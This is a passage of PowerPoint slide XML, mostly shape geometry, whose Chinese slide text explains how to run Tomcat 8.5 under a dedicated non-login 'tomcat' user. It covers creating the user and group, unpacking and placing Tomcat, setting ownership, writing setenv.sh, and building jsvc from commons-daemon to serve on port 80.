                <a:cs typeface="Arial Black"/>
              </a:rPr>
              <a:t>a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/>
              <a:t>用户运行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1266444" y="2282951"/>
            <a:ext cx="7157084" cy="923925"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7157084" h="923925">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156704" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156704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2392" y="2278151"/>
            <a:ext cx="7166609" cy="933450"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7166609" h="933450">
                <a:moveTo>
                  <a:pt x="7161301" y="932853"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="932853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="932624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="931951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="930897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="929563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="928090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23328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="928090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="928090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165835" y="929563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165162" y="930897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7164108" y="931951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7162774" y="932624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="932853"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="933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933450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923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301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933450">
                <a:moveTo>
                  <a:pt x="9525" y="928090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="928090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9525" y="928090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538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28090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156538" y="928090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="928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6444" y="3913632"/>
            <a:ext cx="7157084" cy="922019"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7157084" h="922020">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156704" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156704" y="922019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="92201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2392" y="3908259"/>
            <a:ext cx="7166609" cy="933450"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7166609" h="933450">
                <a:moveTo>
                  <a:pt x="7161301" y="932853"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="932853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="932624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="931951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="930897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="929563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="928090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23328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="928090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="928090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165835" y="929563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165162" y="930897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7164108" y="931951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7162774" y="932624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="932853"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="9334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933450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923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301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933450">
                <a:moveTo>
                  <a:pt x="9525" y="928090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="928090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="933450">
                <a:moveTo>
                  <a:pt x="7156538" y="928090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="928090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538" y="928090"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="933450">
                <a:moveTo>
                  <a:pt x="7166063" y="928090"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156538" y="928090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="923328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="928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6444" y="5462015"/>
            <a:ext cx="7157084" cy="370840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7157084" h="370839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156704" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="715670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2392" y="5457672"/>
            <a:ext cx="7166609" cy="379095"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7166609" h="379095">
                <a:moveTo>
                  <a:pt x="716130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51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="376897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7166063" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165835" y="375564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7165162" y="376897"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7164108" y="377951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7162774" y="378625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="378853"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="37909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379095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379095">
                <a:moveTo>
                  <a:pt x="7156538" y="374091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369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="379095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379095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7166609" h="379095">
                <a:moveTo>
                  <a:pt x="715653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7156538" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7156538" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7166609" h="379095">
                <a:moveTo>
                  <a:pt x="7166063" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7156538" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7161301" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7166063" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716606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9851" y="1597722"/>
            <a:ext cx="11069421" cy="4616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创建用户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组（如果没有，配置单独用户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运行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Tomcat8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服务，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这这里配置的</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="85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是无登录权限的账户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718185">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1255"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>#groupadd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</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="718185" marR="434086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#useradd </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-s </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/sbin/nologin </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-g </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>tomcat tomcat  #usermod </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-L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718185" indent="-70612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解压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8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并复制到</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="9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用户目录下</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="718185" marR="4607560" algn="just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tar </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-zxv -f </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>apache-tomcat-8.5.20.tar.gz  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" spc="-10">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="718185" marR="4607560" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1440"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>mv </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>apache-tomcat-8.5.20 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>tomcat8520  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" spc="-5">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="718185" marR="4607560" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1440"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>mv </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>tomcat8520/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/home/tomcat/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授权目录权限给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用户</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="718185" algn="just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chown </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-R </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>tomcat:tomcat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/home/tomcat/tomcat8520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1374100"/>
            <a:ext cx="75135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在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8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bin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目录下添加启动配置</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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setenv.sh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4483087"/>
            <a:ext cx="2362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通用户下打开</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="5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80</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="18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zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>端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口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3955" y="1720595"/>
            <a:ext cx="7204075" cy="2123440"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7204075" h="2123440">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7203948" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7203948" y="2122931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21229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091" y="1715439"/>
            <a:ext cx="7213600" cy="2133600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7213600" h="2133600">
                <a:moveTo>
                  <a:pt x="7208367" y="2133193"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2133193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="2132952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1968" y="2132279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="2131225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="2129891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2128431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7208367" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="721313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23668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="2123668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2128431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213130" y="2128431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7212901" y="2129891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7212228" y="2131225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7211174" y="2132279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7209840" y="2132952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7208367" y="2133193"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7213600" h="21336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213600" h="2133600">
                <a:moveTo>
                  <a:pt x="720360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203605" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7203605" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7213600" h="2133600">
                <a:moveTo>
                  <a:pt x="7203605" y="2128431"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7203605" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7208367" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213130" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213130" y="2123668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7208367" y="2123668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7203605" y="2128431"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7213600" h="2133600">
                <a:moveTo>
                  <a:pt x="7213130" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7208367" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7203605" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213130" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213130" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7213600" h="2133600">
                <a:moveTo>
                  <a:pt x="9525" y="2128431"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2123668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2123668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2128431"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7213600" h="2133600">
                <a:moveTo>
                  <a:pt x="7203605" y="2128431"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="2128431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2123668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7203605" y="2123668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7203605" y="2128431"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7213600" h="2133600">
                <a:moveTo>
                  <a:pt x="7213130" y="2128431"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7203605" y="2128431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7208367" y="2123668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213130" y="2123668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213130" y="21284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741792"/>
            <a:ext cx="9626600" cy="274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935" marR="4727575">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="3145790" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t># cd </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/home/tomcat/tomcat8520/bin  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>#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setenv.sh	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>内容如下：</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Noto Sans CJK JP Regular"/>
              <a:cs typeface="Noto Sans CJK JP Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1842135" marR="441515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#add tomcat pid  C</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-125" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006FC0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>AT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ALINA_PID="/var/run/to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="160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cat.pid"  #add </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006FC0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JAVA_HOME  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="006FC0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JAVA_HOME=/usr/java/default</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1842135" marR="612521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#add</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600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006FC0"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>JAVA_OPTS  JAVA_OPTS=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编译安装</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="8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jsvc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jsvc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是</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="8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daemon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模式用来启动</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="8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8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的程序，通过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语言编译，可以在普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23844" y="4593335"/>
            <a:ext cx="7204075" cy="1754505"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7204075" h="1754504">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7203948" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7203948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8992" y="4588903"/>
            <a:ext cx="7213600" cy="1764030"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7213600" h="1764029">
                <a:moveTo>
                  <a:pt x="7208367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68" y="1762937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914" y="1761883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228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7208367" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="721313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7213130" y="1759089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7212901" y="1760562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7212215" y="1761883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7211161" y="1762937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7209840" y="1763623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7208367" y="1763852"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7213600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213600" h="1764029">
                <a:moveTo>
                  <a:pt x="720360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203605" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7203605" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7213600" h="1764029">
                <a:moveTo>
                  <a:pt x="7203605" y="1759089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7203605" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7208367" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213130" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213130" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7208367" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7203605" y="1759089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7213600" h="1764029">
                <a:moveTo>
                  <a:pt x="7213130" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7208367" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7203605" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213130" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213130" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7213600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7213600" h="1764029">
                <a:moveTo>
                  <a:pt x="7203605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7203605" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7203605" y="1759089"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7213600" h="1764029">
                <a:moveTo>
                  <a:pt x="7213130" y="1759089"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7203605" y="1759089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7208367" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213130" y="1754327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7213130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23844" y="4615256"/>
            <a:ext cx="720407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# cd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/home/tomcat/tomcat8520/bin</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805" marR="2837180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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>tar </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>-zxvf </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>commons-daemon-native.tar.gz  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t># cd </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>commons-daemon-1.0.15-native-src/  #./configure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--with-java=/usr/java/default</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9080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make</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9080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cp jsvc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../..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2307" y="3811270"/>
            <a:ext cx="2870200" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2870200" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2869692" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28696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118360" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2118360" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2118360" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211836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851" y="1597723"/>
